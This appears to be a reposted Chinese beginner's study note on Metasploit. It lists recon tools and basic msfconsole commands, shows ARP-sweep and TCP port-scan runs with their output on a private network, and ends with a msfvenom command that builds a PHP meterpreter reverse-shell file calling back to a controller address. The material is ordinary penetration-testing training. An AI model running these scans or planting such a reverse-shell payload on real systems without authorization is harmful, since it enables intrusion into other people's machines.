网络安全msf学习1

工具：netcat

用途：端口连接、数据提交

工具nmap

用途：端口扫描、服务识别、操作系统指纹识别

工具 httprint

用途：通过远程http指纹判断http服务类型

工具： tamper ie

用途： http数据包修改、转发工具firefox插件

2.MSF命令

msfconsole 进入

0.help /?

1.search help search 搜索

2.info 查看模块详细用法

3.use 使用

show options查看参数

4.set x y 设置参数

set rhost 192.168.0.1

5.run /expoit

6.back 退回主界面

7.quit/exit 退出msf

2.信息收集

用来发现主机的

use auxiliary/scanner/discovery/arp_sweep

例子：

msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                         metasploit.html
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    5                yes       The number of seconds to wait for new data

rhosts threads timout是必填项

msf6 auxiliary(scanner/discovery/arp_sweep) > set rhost 192.168.50.1/24
rhost => 192.168.50.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
[+] 192.168.50.2 appears to be up (HUAWEI TECHNOLOGIES CO.,LTD).
[+] 192.168.50.3 appears to be up (Cisco Systems).
[+] 192.168.50.21 appears to be up (UNKNOWN).
[+] 192.168.50.23 appears to be up (UNKNOWN).
[+] 192.168.50.25 appears to be up (UNKNOWN).
[+] 192.168.50.26 appears to be up (UNKNOWN).
[+] 192.168.50.29 appears to be up (UNKNOWN).
[+] 192.168.50.30 appears to be up (UNKNOWN).
[+] 192.168.50.35 appears to be up (UNKNOWN).
[+] 192.168.50.37 appears to be up (UNKNOWN).
[+] 192.168.50.68 appears to be up (UNKNOWN).
[+] 192.168.50.53 appears to be up (VMware, Inc.).
[+] 192.168.50.74 appears to be up (UNKNOWN).
[+] 192.168.50.96 appears to be up (AIO LCD PC BU / TPV).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
                                           g-metasploit.html
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.50.96
rhosts => 192.168.50.96
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.50.96:        - 192.168.50.96:135 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:139 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:445 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:1027 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:5040 - TCP OPEN
[+] 192.168.50.96:        - 192.168.50.96:8900 - TCP OPEN
[*] 192.168.50.96:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

正向攻击控制机直接控制靶机

反弹攻击控制机打开端口靶机运行木马反向连接控制机

制作木马、获得反弹链接的shell

完整流程如下：

1.msfvenom 生成木马文件

2、msf监听指定端口

3、访问木马文件、获得meterpreter连接

不用启动msf交互终端msfconsole就可以制作木马

使用msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=7777 -o shell.php

启动lhost 和lport为控制机地址和端口号。前提是控制机需要开启7777这个端口号的监听程序

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/460271.html